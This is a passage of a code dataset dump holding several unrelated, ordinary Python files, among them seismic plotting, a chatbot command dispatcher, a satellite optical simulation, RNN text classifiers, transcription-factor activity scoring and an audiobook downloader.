logging\nfrom global_variable import *\n\n\nclass Drawer():\n def __init__(self):\n self.db = SeismDb()\n\n def drawTightMatrix(self, plane_name, depth, saveDir=''):\n matrix = self.db.queryMatrix(plane_name, depth)\n print(matrix)\n fig = plt.imshow(matrix, vmin=vmin, vmax=vmax, cmap=plt.get_cmap(\"Greys\"))\n fig.axes.get_xaxis().set_visible(False)\n fig.axes.get_yaxis().set_visible(False)\n if saveDir == '':\n plt.show()\n else:\n path = os.path.join(saveDir, '{0}.png'.format(depth))\n if os.path.exists(path):\n logging.info('{0}已存在'.format(depth))\n else:\n try:\n plt.savefig(path, bbox_inches='tight', pad_inches=0)\n logging.info('{0}_{1}绘制完成'.format(plane_name, depth))\n plt.close()\n except FileNotFoundError:\n os.mkdir(saveDir)\n plt.savefig(path, bbox_inches='tight', pad_inches=0)\n plt.ioff()\n plt.axis('off')\n\n def drawMatrix(self, plane_name, depth, saveDir=''):\n matrix = self.db.queryMatrix(plane_name, depth)\n fig, ax = plt.subplots()\n im = ax.matshow(matrix, vmin=vmin, vmax=vmax)\n divider = make_axes_locatable(ax)\n cax = divider.new_horizontal(size=\"5%\", pad=0.3, pack_start=False)\n fig.add_axes(cax)\n cbar = fig.colorbar(im, cax=cax, orientation=\"vertical\", extend='both')\n cbar.minorticks_on()\n if saveDir == '':\n plt.show()\n else:\n path = os.path.join(saveDir, '{0}.png'.format(depth))\n if os.path.exists(path):\n logging.info('{0}已存在'.format(depth))\n else:\n try:\n plt.savefig(path)\n plt.close(fig)\n logging.info('{0}_{1}绘制完成'.format(plane_name, depth))\n except FileNotFoundError:\n os.mkdir(saveDir)\n plt.savefig(path)\n plt.close(fig)\n\n def drawCoors(self, x, y):\n matrix = [self.db.queryByOneCoord(x, y)]\n fig = plt.imshow(matrix, vmin=vmin, vmax=vmax, aspect='auto')\n fig.axes.get_xaxis().set_visible(False)\n fig.axes.get_yaxis().set_visible(False)\n return fig\n\n def drawBound(self, ox, oy, tx, ty):\n matrix = self.db.queryBound(ox, oy, tx, ty)\n fig = plt.imshow(matrix, vmin=vmin, vmax=vmax, aspect='auto')\n fig.axes.get_xaxis().set_visible(False)\n fig.axes.get_yaxis().set_visible(False)\n return fig\n\n\ndef drawAll():\n logging.basicConfig(level=logging.INFO)\n matplotlib.use('Agg')\n plt.ioff()\n plt.axis('off')\n\n drawer = Drawer()\n \"\"\"\n for i in range(0, zDepth):\n drawer.drawTightMatrix(\"xy\", i, './imgs/xy/')\n \n for i in range(0,rowCount):\n drawer.drawTightMatrix('xz', i, './imgs/{0}/'.format('xz'))\n\n for i in range(0, colCount):\n drawer.drawTightMatrix('yz', i, './imgs/{0}/'.format('yz'))\n \"\"\"\n\n\nif __name__ == '__main__':\n drawer = Drawer()\n drawAll()\n","sub_path":"server/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151513720","text":"from uuid import uuid4\n\nfrom sourced.ml.extractors.roles_and_ids import RolesAndIdsExtractor\nfrom sourced.ml.transformers import Ignition, UastExtractor, UastDeserializer, \\\n HeadFiles, Uast2BagFeatures, Cacher, UastRow2Document, CsvSaver\nfrom sourced.ml.transformers.basic import Rower\nfrom sourced.ml.utils import create_engine\nfrom sourced.ml.utils.engine import pause\n\n\n@pause\ndef repos2roles_and_ids_entry(args):\n engine = create_engine(\"repos2roles_and_ids-%s\" % uuid4(), **args.__dict__)\n\n Ignition(engine, explain=args.explain) \\\n .link(HeadFiles()) \\\n .link(UastExtractor(languages=args.languages)) \\\n .link(UastRow2Document()) \\\n .link(Cacher.maybe(args.persist)) \\\n .link(UastDeserializer()) \\\n 
.link(Uast2BagFeatures([RolesAndIdsExtractor(args.split)])) \\\n .link(Rower(lambda x: dict(identifier=x[0][0], role=x[1]))) \\\n .link(CsvSaver(args.output)) \\\n .execute()\n","sub_path":"sourced/ml/cmd_entries/repos2roles_and_ids.py","file_name":"repos2roles_and_ids.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"74469921","text":"from __future__ import absolute_import\n\nimport logging\nimport time\nfrom celery import shared_task\n\n# Get an instance of a logger\nlogger = logging.getLogger('erapp')\n\n@shared_task\ndef celery_test():\n\tlogger.info('running celery_test task...')\n\ttime.sleep(5)\n\tlogger.info('finishing long-running celery task')\n\n@shared_task\ndef parse_logs():\n\tlogger.info('parsing logs...')\n\ttime.sleep(5)\n\tlogger.info('finishing parsing logs')\n","sub_path":"erprototype/erapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60047831","text":"import sys, json, asyncio, logging, os\n\nimport hangups\nfrom hangups.ui.utils import get_conv_name\n\nfrom utils import text_to_segments\n\n\nclass CommandDispatcher(object):\n \"\"\"Register commands and run them\"\"\"\n def __init__(self):\n self.commands = {}\n self.unknown_command = None\n\n\n @asyncio.coroutine\n def run(self, bot, event, *args, **kwds):\n \"\"\"Run command\"\"\"\n try:\n func = self.commands[args[0]]\n except KeyError:\n if self.unknown_command:\n func = self.unknown_command\n else:\n raise\n\n # Automatically wrap command function in coroutine\n # (so we don't have to write @asyncio.coroutine decorator before every command function)\n func = asyncio.coroutine(func)\n\n args = list(args[1:])\n\n try:\n yield from func(bot, event, *args, **kwds)\n except Exception as e:\n message = \"CommandDispatcher.run: {}\".format(func.__name__)\n print(\"EXCEPTION in \" + message)\n logging.exception(message)\n\n\n def register(self, func):\n \"\"\"Decorator for registering command\"\"\"\n self.commands[func.__name__] = func\n return func\n\n def register_unknown(self, func):\n \"\"\"Decorator for registering unknown command\"\"\"\n self.unknown_command = func\n return func\n\n\n# CommandDispatcher singleton\ncommand = CommandDispatcher()\n\n@command.register\ndef help(bot, event, cmd=None, *args):\n \"\"\"list supported commands\"\"\"\n if not cmd:\n admins_list = bot.get_config_suboption(event.conv_id, 'admins')\n\n commands_all = command.commands.keys()\n commands_admin = bot._handlers.get_admin_commands(event.conv_id)\n commands_nonadmin = list(set(commands_all) - set(commands_admin))\n\n text_html = 'User commands:    ' + ', '.join(sorted(commands_nonadmin))\n if event.user_id.chat_id in admins_list:\n text_html = text_html + '    Admin commands:    ' + ', '.join(sorted(commands_admin))\n else:\n try:\n command_fn = command.commands[cmd]\n text_html = \"{}: {}\".format(cmd, command_fn.__doc__)\n except KeyError:\n yield from command.unknown_command(bot, event)\n return\n\n # help can get pretty long, so we send a short message publicly, and the actual help privately\n conv_1on1_initiator = bot.get_1on1_conversation(event.user.id_.chat_id)\n if conv_1on1_initiator:\n bot.send_message_parsed(conv_1on1_initiator, text_html)\n if conv_1on1_initiator.id_ != event.conv_id:\n bot.send_message_parsed(event.conv, \"{}, I've sent you some help ;)\".format(event.user.full_name))\n else:\n bot.send_message_parsed(event.conv, \"{}, before I can help you, you need to private message me and say hi.\".format(event.user.full_name))\n\n\n@command.register\ndef ping(bot, event, *args):\n \"\"\"reply to a ping\"\"\"\n bot.send_message(event.conv, 'pong')\n\n\n@command.register_unknown\ndef unknown_command(bot, event, *args):\n \"\"\"handle unknown commands\"\"\"\n bot.send_message(event.conv,\n '{}: unknown command'.format(event.user.full_name))","sub_path":"hangupsbot/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189669218","text":"import itertools\n\ndef fibonacci():\n a, b = 0, 1\n while True:\n yield b\n a, b = b, a+b\n\nf = fibonacci()\nnext(f) # 1\n[i for i in itertools.takewhile(lambda x: x < 100, f)]\n# [1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\n","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136490923","text":"from .ttypes import Types\nimport sys\n\nclass Column:\n\n def __init__(self, name, pos):\n self.name = name\n self.idx = pos\n self.data = []\n self.type = None\n\n def addData(self, data):\n if len(data) > 0:\n self.type = Types.getType(data[0])\n assert len(self.data) == 0\n self.data = data\n return self\n\n def appendElement(self, elem):\n assert type(elem) is not list and type(elem) is not tuple, \"Call addData when passing a list or tuple\"\n if self.type == None:\n self.type = Types.getType(elem)\n else:\n #assert type(elem) == self.type\n pass\n\n self.data.append(elem)\n return self\n\n # Create new list of values\n def indexOf(self, filter):\n \"\"\" Return a list of indexes of the elements of the column that satisfy:\n filter(i, c[i]) = True\n \"\"\"\n idx = []\n for i in range(len(self.data)):\n v = self.data[i]\n if filter(i, v): idx.append(i)\n return idx\n\n def collect(self, filter):\n \"\"\" Returns a list of the elements (e[i]) of the list that satisfy: filter(i, e[i]) = True \"\"\" \n \n values = []\n for i in range(len(self.data)):\n v = self.data[i]\n if (filter(i, v)): values.append(v)\n return values\n\n def remove(self, filter):\n \"\"\" Removes elements (e[i]) of this column that satisfy: filter(i, e[i]) = True\n The number of elements stored in this column may be fewer after calling this function.\n \"\"\"\n ndata = []\n for i in range(len(self.data)):\n v = self.data[i]\n if filter(i, v):\n pass\n else:\n ndata.append(v)\n self.data = ndata\n\n def clone(self):\n \"\"\" Returns an exact copy of this column that does not share data with \n this column (deep-copy)\n \"\"\" \n c = Column(self.name, self.idx)\n c.addData(self.data.copy())\n return c\n\n def apply(self, func):\n \"\"\" Creates a new column with element i in this column 
as: c[i] = func(i, c[i]) \n Similar to apply, but it changes the values in place.\n \"\"\"\n nvals = []\n for i in range(len(self.data)):\n d = self.data[i]\n val = func(i, d)\n nvals.append(val)\n return nvals\n\n def map(self, func):\n \"\"\" Assign value to element i in this column as: c[i] = func(i, c[i]) \n Similar to apply, but it changes the values in place.\n \"\"\"\n nvals = []\n for i in range(len(self.data)):\n d = self.data[i]\n self.data[i] = func(i, d)\n return self\n\n def reduce(self, func, result):\n \"\"\" Applies func on each element of this column and returns the final result.\n The function func must have the type: func(i, e, result), where result is \n either the value passed to the function or the result of the last call to \n func.\n For example, to compute the minimum value of a column:\n c.reduce(func = lambda (i, e, result): e if e < result else result, result = BIG_NUMBER )\n \"\"\"\n \n for i in range(len(self.data)):\n e = self.data[i]\n result = func(i, e, result)\n return result\n\n def list(self, out = sys.stdout, writeName = False):\n \"\"\" Write elements of column to out. \"\"\"\n if writeName: print(self.name) \n for e in self.data: print(e)\n \n def __str__(self):\n s = \"Col[%4s]: \\t %20s \\t %4s< \\t %6d\"%(self.idx, self.name, self.type, len(self.data) )\n return s\n\n def __getitem__(self, idx):\n assert idx < len(self.data)\n return self.data[idx]\n\n def __len__(self):\n return len(self.data)\n\n def __iter__(self):\n for v in self.data:\n yield v\n\nif __name__ == \"__main__\":\n c = Column(\"Waste\", 0)\n c.addData([1,2,3,4,5])\n print(c)\n\n sum = c.reduce(func = lambda i, d, result: result + d, result = 0)\n print(\"sum: %d\"%sum)\n\n min = c.reduce(func = lambda i, d, result: result if result < d else d, result=100000)\n print(\"min: %d\"%min)","sub_path":"src/column.py","file_name":"column.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128941856","text":"\nimport os, sys\n\nfrom ism.src.initIsm import initIsm\nfrom math import pi\nfrom ism.src.mtf import mtf\nfrom numpy.fft import fftshift, ifft2, fft2\nimport numpy as np\nfrom common.io.writeToa import writeToa\nfrom common.io.readIsrf import readIsrf\nfrom scipy.interpolate import interp1d, interp2d\nfrom common.plot.plotMat2D import plotMat2D\nfrom common.plot.plotF import plotF\nfrom scipy.signal import convolve2d\nfrom common.src.auxFunc import getIndexBand\n\nclass opticalPhase(initIsm):\n\n def __init__(self, auxdir, indir, outdir):\n super().__init__(auxdir, indir, outdir)\n\n def compute(self, sgm_toa, sgm_wv, band):\n \"\"\"\n The optical phase is in charge of simulating the radiance\n to irradiance conversion, the spatial filter (PSF)\n and the spectral filter (ISRF).\n :return: TOA image in irradiances [mW/m2/nm],\n with spatial and spectral filter\n \"\"\"\n self.logger.info(\"EODP-ALG-ISM-1000: Optical stage\")\n\n # Calculation and application of the ISRF\n # -------------------------------------------------------------------------------\n self.logger.info(\"EODP-ALG-ISM-1010: Spectral modelling. 
ISRF\")\n toa = self.spectralIntegration(sgm_toa, sgm_wv, band)\n\n self.logger.debug(\"TOA [0,0] \" +str(toa[0,0]) + \" [e-]\")\n\n if self.ismConfig.save_after_isrf:\n saveas_str = self.globalConfig.ism_toa_isrf + band\n\n writeToa(self.outdir, saveas_str, toa)\n # Radiance to Irradiance conversion\n # -------------------------------------------------------------------------------\n self.logger.info(\"EODP-ALG-ISM-1020: Radiances to Irradiances\")\n toa = self.rad2Irrad(toa,\n self.ismConfig.D,\n self.ismConfig.f,\n self.ismConfig.Tr)\n\n self.logger.debug(\"TOA [0,0] \" +str(toa[0,0]) + \" [e-]\")\n\n # Spatial filter\n # -------------------------------------------------------------------------------\n # Calculation and application of the system MTF\n self.logger.info(\"EODP-ALG-ISM-1030: Spatial modelling. PSF/MTF\")\n myMtf = mtf(self.logger)\n Hsys = myMtf.system_mtf(toa.shape[0], toa.shape[1],\n self.ismConfig.D, self.ismConfig.wv[getIndexBand(band)], self.ismConfig.f, self.ismConfig.pix_size,\n self.ismConfig.kLF, self.ismConfig.wLF, self.ismConfig.kHF, self.ismConfig.wHF,\n self.ismConfig.defocus, self.ismConfig.ksmear, self.ismConfig.kmotion,\n self.outdir, band)\n\n toa = self.applySysMtf(toa, Hsys) # always calculated\n\n self.logger.debug(\"TOA [0,0] \" +str(toa[0,0]) + \" [e-]\")\n\n # Write output TOA & plots\n # -------------------------------------------------------------------------------\n if self.ismConfig.save_optical_stage:\n saveas_str = self.globalConfig.ism_toa_optical + band\n\n writeToa(self.outdir, saveas_str, toa)\n\n title_str = 'TOA after the optical phase [mW/sr/m2]'\n xlabel_str='ACT'\n ylabel_str='ALT'\n plotMat2D(toa, title_str, xlabel_str, ylabel_str, self.outdir, saveas_str)\n\n idalt = int(toa.shape[0]/2)\n saveas_str = saveas_str + '_alt' + str(idalt)\n plotF([], toa[idalt,:], title_str, xlabel_str, ylabel_str, self.outdir, saveas_str)\n\n return toa\n\n def rad2Irrad(self, toa, D, f, Tr):\n \"\"\"\n Radiance to Irradiance conversion\n :param toa: Input TOA image in radiances [mW/sr/m2]\n :param D: Pupil diameter [m]\n :param f: Focal length [m]\n :param Tr: Optical transmittance [-]\n :return: TOA image in irradiances [mW/m2]\n \"\"\"\n\n TOA_I = toa*Tr*np.pi/4*((D/f)**2)\n\n return TOA_I\n\n\n def applySysMtf(self, toa, Hsys):\n \"\"\"\n Application of the system MTF to the TOA\n :param toa: Input TOA image in irradiances [mW/m2]\n :param Hsys: System MTF\n :return: TOA image in irradiances [mW/m2]\n \"\"\"\n\n toa_fft = fft2(toa)\n Hsys_shift = fftshift(Hsys)\n toa_MTF = toa_fft*Hsys_shift\n toa_ft = ifft2(toa_MTF)\n tol = np.ones(toa_ft.shape)*1e-10\n if (toa_ft.imag < tol).all:\n toa_ft = toa_ft.real\n\n\n return toa_ft\n\n\n def spectralIntegration(self, sgm_toa, sgm_wv, band):\n \"\"\"\n Integration with the ISRF to retrieve one band\n :param sgm_toa: Spectrally oversampled TOA cube 3D in irradiances [mW/m2]\n :param sgm_wv: wavelengths of the input TOA cube\n :param band: band\n :return: TOA image 2D in radiances [mW/m2]\n \"\"\"\n isrf, wv_isrf = readIsrf(self.auxdir+os.path.sep+self.ismConfig.isrffile, band)\n wv_isrf = wv_isrf*1e3 # [nm]\n\n isrf_norm = isrf/np.sum(isrf)\n toa = np.zeros((sgm_toa.shape[0],sgm_toa.shape[1]))\n\n for ialt in range(0,sgm_toa.shape[0]):\n for iact in range(0, sgm_toa.shape[1]):\n cs = interp1d(sgm_wv, sgm_toa[ialt,iact,:], fill_value=(0, 0), bounds_error=False)\n toa_interp = cs(wv_isrf)\n toa[ialt,iact] = np.sum(toa_interp*isrf_norm)\n\n return 
toa\n","sub_path":"ism/src/opticalPhase.py","file_name":"opticalPhase.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"15878219","text":"import numpy as np\r\nimport pandas\r\nimport tensorflow as tf\r\nimport pylab as plt\r\nimport csv\r\n\r\n\r\nMAX_DOCUMENT_LENGTH = 100\r\nHIDDEN_SIZE = 20\r\nMAX_LABEL = 15\r\nEMBEDDING_SIZE = 20\r\nbatch_size = 128\r\nis_dropout = True\r\nkeep_prob = 0.5\r\nmodel = 'lstm'\r\nlayer = 1\r\n\r\nno_epochs = 1000\r\nlr = 0.01\r\n\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\nseed = 10\r\ntf.set_random_seed(seed)\r\n\r\n\r\ndef char_rnn_model(x, is_dropout, keep_prob, model):\r\n\r\n byte_vectors = tf.one_hot(x, 256)\r\n byte_list = tf.unstack(byte_vectors, axis=1)\r\n\r\n with tf.variable_scope('RNN_1'):\r\n\r\n # choose cell type\r\n if model == 'rnn':\r\n cell_fn = tf.nn.rnn_cell.BasicRNNCell\r\n elif model == 'gru':\r\n cell_fn = tf.nn.rnn_cell.GRUCell\r\n elif model == 'lstm':\r\n cell_fn = tf.nn.rnn_cell.LSTMCell\r\n\r\n # multi-layer cell\r\n if(layer > 1):\r\n cell1 = cell_fn(HIDDEN_SIZE,reuse = tf.get_variable_scope().reuse)\r\n cell2 = cell_fn(HIDDEN_SIZE,reuse = tf.get_variable_scope().reuse)\r\n cell = tf.nn.rnn_cell.MultiRNNCell([cell1,cell2])\r\n else:\r\n cell = cell_fn(HIDDEN_SIZE)\r\n\r\n if is_dropout:\r\n cell = tf.nn.rnn_cell.DropoutWrapper(cell,input_keep_prob= keep_prob,output_keep_prob= keep_prob)\r\n\r\n _, encoding = tf.nn.static_rnn(cell, byte_list, dtype=tf.float32)\r\n\r\n if isinstance(encoding, tuple):\r\n encoding = encoding[-1]\r\n\r\n logits = tf.layers.dense(encoding, MAX_LABEL, activation=None)\r\n\r\n return logits\r\n\r\ndef word_rnn_model(x, is_dropout, keep_prob, model):\r\n\r\n word_vectors = tf.contrib.layers.embed_sequence(\r\n x, vocab_size=n_words, embed_dim=EMBEDDING_SIZE)\r\n\r\n word_list = tf.unstack(word_vectors, axis=1)\r\n\r\n with tf.variable_scope('RNN_2'):\r\n\r\n # choose cell type\r\n if model == 'rnn':\r\n cell_fn = tf.nn.rnn_cell.BasicRNNCell\r\n elif model == 'gru':\r\n cell_fn = tf.nn.rnn_cell.GRUCell\r\n elif model == 'lstm':\r\n cell_fn = tf.nn.rnn_cell.LSTMCell\r\n\r\n # multi-layer cell\r\n if(layer > 1):\r\n cell1 = cell_fn(HIDDEN_SIZE,reuse = tf.get_variable_scope().reuse)\r\n cell2 = cell_fn(HIDDEN_SIZE,reuse = tf.get_variable_scope().reuse)\r\n cell = tf.nn.rnn_cell.MultiRNNCell([cell1,cell2])\r\n else:\r\n cell = cell_fn(HIDDEN_SIZE)\r\n\r\n if is_dropout:\r\n cell = tf.nn.rnn_cell.DropoutWrapper(cell,input_keep_prob= keep_prob,output_keep_prob= keep_prob)\r\n\r\n _, encoding = tf.nn.static_rnn(cell, word_list, dtype=tf.float32)\r\n\r\n if isinstance(encoding, tuple):\r\n encoding = encoding[-1]\r\n\r\n logits = tf.layers.dense(encoding, MAX_LABEL, activation=None)\r\n\r\n return logits\r\n\r\n\r\ndef data_read_words():\r\n \r\n x_train, y_train, x_test, y_test = [], [], [], []\r\n \r\n with open('train_medium.csv', encoding='utf-8') as filex:\r\n reader = csv.reader(filex)\r\n for row in reader:\r\n x_train.append(row[2])\r\n y_train.append(int(row[0]))\r\n\r\n with open(\"test_medium.csv\", encoding='utf-8') as filex:\r\n reader = csv.reader(filex)\r\n for row in reader:\r\n x_test.append(row[2])\r\n y_test.append(int(row[0]))\r\n \r\n x_train = pandas.Series(x_train)\r\n y_train = pandas.Series(y_train)\r\n x_test = pandas.Series(x_test)\r\n y_test = pandas.Series(y_test)\r\n y_train = y_train.values\r\n y_test = y_test.values\r\n \r\n vocab_processor = 
tf.contrib.learn.preprocessing.VocabularyProcessor(\r\n MAX_DOCUMENT_LENGTH)\r\n\r\n x_transform_train = vocab_processor.fit_transform(x_train)\r\n x_transform_test = vocab_processor.transform(x_test)\r\n\r\n x_train = np.array(list(x_transform_train))\r\n x_test = np.array(list(x_transform_test))\r\n\r\n no_words = len(vocab_processor.vocabulary_)\r\n print('Total words: %d' % no_words)\r\n\r\n return x_train, y_train, x_test, y_test, no_words\r\n\r\ndef read_data_chars():\r\n \r\n x_train, y_train, x_test, y_test = [], [], [], []\r\n\r\n with open('train_medium.csv', encoding='utf-8') as filex:\r\n reader = csv.reader(filex)\r\n for row in reader:\r\n x_train.append(row[1])\r\n y_train.append(int(row[0]))\r\n\r\n with open('test_medium.csv', encoding='utf-8') as filex:\r\n reader = csv.reader(filex)\r\n for row in reader:\r\n x_test.append(row[1])\r\n y_test.append(int(row[0]))\r\n \r\n x_train = pandas.Series(x_train)\r\n y_train = pandas.Series(y_train)\r\n x_test = pandas.Series(x_test)\r\n y_test = pandas.Series(y_test)\r\n \r\n \r\n char_processor = tf.contrib.learn.preprocessing.ByteProcessor(MAX_DOCUMENT_LENGTH)\r\n \r\n x_train = np.array(list(char_processor.fit_transform(x_train)))\r\n x_test = np.array(list(char_processor.transform(x_test)))\r\n y_train = y_train.values\r\n y_test = y_test.values\r\n \r\n return x_train, y_train, x_test, y_test\r\n\r\n\r\ndef read_data(case):\r\n x_train, y_train, x_test, y_test = [], [], [], []\r\n n_words = 0\r\n\r\n if(case == 'rnn-char'):\r\n x_train, y_train, x_test, y_test = read_data_chars()\r\n elif(case == 'rnn-word'):\r\n x_train, y_train, x_test, y_test, n_words = data_read_words()\r\n\r\n return x_train, y_train, x_test, y_test, n_words\r\n\r\ndef rnn_call(case, x, is_dropout, keep_prob, model):\r\n logits = None\r\n\r\n if(case == 'rnn-char'):\r\n logits = char_rnn_model(x, is_dropout, keep_prob, model)\r\n elif(case == 'rnn-word'):\r\n logits = word_rnn_model(x, is_dropout, keep_prob, model)\r\n \r\n return logits\r\n\r\ndef main():\r\n global n_words\r\n\r\n list_case = ['rnn-char','rnn-word']\r\n all_test_acc = []\r\n \r\n for c,k in enumerate(list_case):\r\n print(k)\r\n x_train, y_train, x_test, y_test, n_words = read_data(k)\r\n\r\n # Create the model\r\n x = tf.placeholder(tf.int64, [None, MAX_DOCUMENT_LENGTH])\r\n y_ = tf.placeholder(tf.int64)\r\n keep_prob = tf.placeholder(tf.float32)\r\n\r\n logits = rnn_call(k,x, is_dropout, keep_prob, model)\r\n\r\n entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=tf.one_hot(y_, MAX_LABEL), logits=logits))\r\n train_op = tf.train.AdamOptimizer(lr).minimize(entropy)\r\n\r\n correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(tf.one_hot(y_, MAX_LABEL),1))\r\n correct_prediction = tf.cast(correct_prediction, tf.float32)\r\n accuracy = tf.reduce_mean(correct_prediction)\r\n\r\n N = len(x_train)\r\n idx = np.arange(N)\r\n\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n\r\n test_acc = []\r\n\r\n \r\n for i in range(no_epochs):\r\n np.random.shuffle(idx)\r\n trainX, trainY = x_train[idx], y_train[idx]\r\n\r\n for start, end in zip(range(0, N, batch_size), range(batch_size, N, batch_size)):\r\n sess.run(train_op, {x: trainX[start:end], y_: trainY[start:end], keep_prob: 0.7})\r\n \r\n test_acc_ = sess.run(accuracy, {x: x_test, y_: y_test, keep_prob: 1.0})\r\n test_acc.append(test_acc_)\r\n \r\n print('iter: %d, testacc: %g'%(i, test_acc[i]))\r\n \r\n\r\n all_test_acc.append(test_acc)\r\n \r\n\r\n plt.figure(1)\r\n 
plt.plot(range(no_epochs), all_test_acc[0], label = 'rnn-char')\r\n plt.plot(range(no_epochs), all_test_acc[1], label = 'rnn-word')\r\n plt.legend(loc='lower right')\r\n plt.xlabel(str(no_epochs) + ' iterations')\r\n plt.ylabel('test accuracy')\r\n plt.title('test accuracy vs. epochs (LSTM)')\r\n\r\n \r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Assignment 2/partb_6_1_b.py","file_name":"partb_6_1_b.py","file_ext":"py","file_size_in_byte":7342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"265172992","text":"import pandas as pd\nimport numpy as np\nimport scanpy as sc\nfrom anndata import AnnData\nimport pickle\nimport pkg_resources\n\n\ndef load_regulons(levels=['A', 'B', 'C', 'D', 'E'], organism='Human'):\n # Get package path\n if organism == \"Human\":\n path = pkg_resources.resource_filename(__name__, 'data/dorothea_hs.pkl')\n elif organism == \"Mouse\":\n path = pkg_resources.resource_filename(__name__, 'data/dorothea_mm.pkl')\n else:\n raise(\"Wrong organism name. Please specify 'Human' or 'Mouse'.\")\n \n # Open pickle object\n df = pickle.load(open(path, \"rb\" ))\n \n #Filter by levels of confidence\n df = df[df['confidence'].isin(levels)]\n \n # Transform to binary dataframe\n dorothea_df = df.pivot(index='target', columns='tf', values='mor')\n \n # Set nans to 0\n dorothea_df[np.isnan(dorothea_df)] = 0\n \n return dorothea_df\n\ndef extract(data, obsm_key='dorothea'):\n obsm = data.obsm\n obs = data.obs\n df = data.obsm['dorothea']\n var = pd.DataFrame(index=df.columns)\n tadata = AnnData(np.array(df), obs=obs, var=var, obsm=obsm)\n return tadata\n \n\ndef process_input(data, use_raw=False):\n if isinstance(data, AnnData):\n if not use_raw:\n genes = np.array(data.var.index)\n idx = np.argsort(genes)\n genes = genes[idx]\n samples = data.obs.index\n X = data.X[:,idx]\n else:\n genes = np.array(data.raw.var.index)\n idx = np.argsort(genes)\n genes = genes[idx]\n samples= data.raw.obs_names\n X = data.raw.X[:,idx]\n elif isinstance(data, pd.DataFrame):\n genes = np.array(df.columns)\n idx = np.argsort(genes)\n genes = genes[idx]\n samples = df.index\n X = np.array(df)[:,idx]\n else:\n raise ValueError('Input must be AnnData or pandas DataFrame.')\n return genes, samples, X\n\n\ndef run(data, regnet, center=True, scale=True, inplace=True, use_raw=False):\n # Get genes, samples/tfs and matrices from data and regnet\n x_genes, x_samples, X = process_input(data, use_raw=use_raw)\n\n assert len(x_genes) == len(set(x_genes)), 'Gene names are not unique'\n\n if X.shape[0] <= 1 and (center or scale):\n raise ValueError('If there is only one observation no centering nor scaling can be performed.')\n\n # Sort targets (rows) alphabetically\n regnet = regnet.sort_index()\n r_targets, r_tfs = regnet.index, regnet.columns\n\n assert len(r_targets) == len(set(r_targets)), 'regnet target names are not unique'\n assert len(r_tfs) == len(set(r_tfs)), 'regnet tf names are not unique'\n\n # Subset by common genes\n common_genes = np.sort(list(set(r_targets) & set(x_genes)))\n\n target_fraction = len(common_genes) / len(r_targets)\n assert target_fraction > .05, f'Too few ({len(common_genes)}) target genes found. 
Make sure you are using the correct organism.'\n\n print(f'{len(common_genes)} targets found')\n\n idx_x = np.searchsorted(x_genes, common_genes)\n X = X[:,idx_x]\n R = regnet.loc[common_genes].values\n\n if center:\n X = X - np.mean(X, axis=0)\n\n # Run matrix mult\n result = np.asarray(X.dot(R))\n\n if scale:\n std = np.std(result, ddof=1, axis=0)\n std[std == 0] = 1\n result = (result - np.mean(result, axis=0)) / std\n\n # Remove nans\n result[np.isnan(result)] = 0\n\n # Store in df\n result = pd.DataFrame(result, columns=r_tfs, index=x_samples)\n\n if isinstance(data, AnnData) and inplace:\n # Update AnnData object\n data.obsm['dorothea'] = result\n else:\n # Return dataframe object\n data = result\n\n return data if not inplace else None\n","sub_path":"dorothea/dorothea.py","file_name":"dorothea.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236284387","text":"from audiobook import Audiobook\nfrom book import Book\nfrom bookmark_reader import BookmarkReader\nfrom downloader import Downloader\nfrom page import Page\n\n\ndef is_audiobook(page):\n found = page.find('Audio ')\n return found > 0\n\n\ndef get_book(first_page):\n if is_audiobook(first_page):\n book = Audiobook(first_page)\n else:\n book = Book(first_page)\n return book\n\n\nclass Reader(object):\n def __init__(self, bookmark):\n self.book_name = bookmark.name\n self.book_address = bookmark.address\n self.book = None\n\n def read(self):\n with Downloader() as downloader:\n first_page = Page(downloader.get(self.book_address))\n self.book = get_book(first_page)\n self.book.read(downloader)\n\n def save(self, path):\n self.book.save(path)\n\n\nif __name__ == \"__main__\":\n for bookmark in BookmarkReader().bookmarks:\n reader = Reader(bookmark)\n reader.read()\n reader.save('downloads')\n","sub_path":"reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"545810440","text":"import random\nimport math\n\nfrom code.algorithms.hillclimber import hillclimber\n\n\nclass simulated_annealing(hillclimber):\n \"\"\"\n The SimulatedAnnealing class that randomly reattaches a group of houses' cables. 
